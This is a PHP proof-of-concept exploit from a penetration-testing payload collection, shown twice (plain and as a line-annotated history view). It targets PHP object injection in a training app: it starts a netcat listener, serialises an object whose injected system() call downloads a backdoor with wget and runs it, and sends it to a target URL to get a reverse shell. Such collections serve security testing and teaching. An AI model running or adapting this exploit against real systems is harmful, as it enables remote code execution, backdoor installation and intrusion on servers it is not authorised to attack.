PayloadsAllTheThings/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php

<?php 
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com

A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 

Shouts to @jstnkndy @yappare for the assist!

NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/

print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');

class PHPObjectInjection
{
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");

?>
XXE payloads 2016-10-18 07:06:10 +00:00			`<?php`
			`/*`
			`PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com`

			`A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.`

			`Shouts to @jstnkndy @yappare for the assist!`

			`NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured`
			`*/`

			`print "==============================================================================\r\n";`
			`print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";`
			`print "==============================================================================\r\n";`
			`print "[+] Generating serialized payload...[OK]\r\n";`
			`print "[+] Launching reverse listener...[OK]\r\n";`
			`system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');`

			`class PHPObjectInjection`
			`{`
			`// CHANGE URL/FILENAME TO MATCH YOUR SETUP`
Payloads - Quick fix 2018-02-23 12:48:51 +00:00			`public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";`
XXE payloads 2016-10-18 07:06:10 +00:00			`}`

			`$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER`
			`$url = $url . urlencode(serialize(new PHPObjectInjection));`
			`print "[+] Sending exploit...[OK]\r\n";`
			`print "[+] Dropping down to interactive shell...[OK]\r\n";`
			`print "==============================================================================\r\n";`
			`$response = file_get_contents("$url");`

			`?>`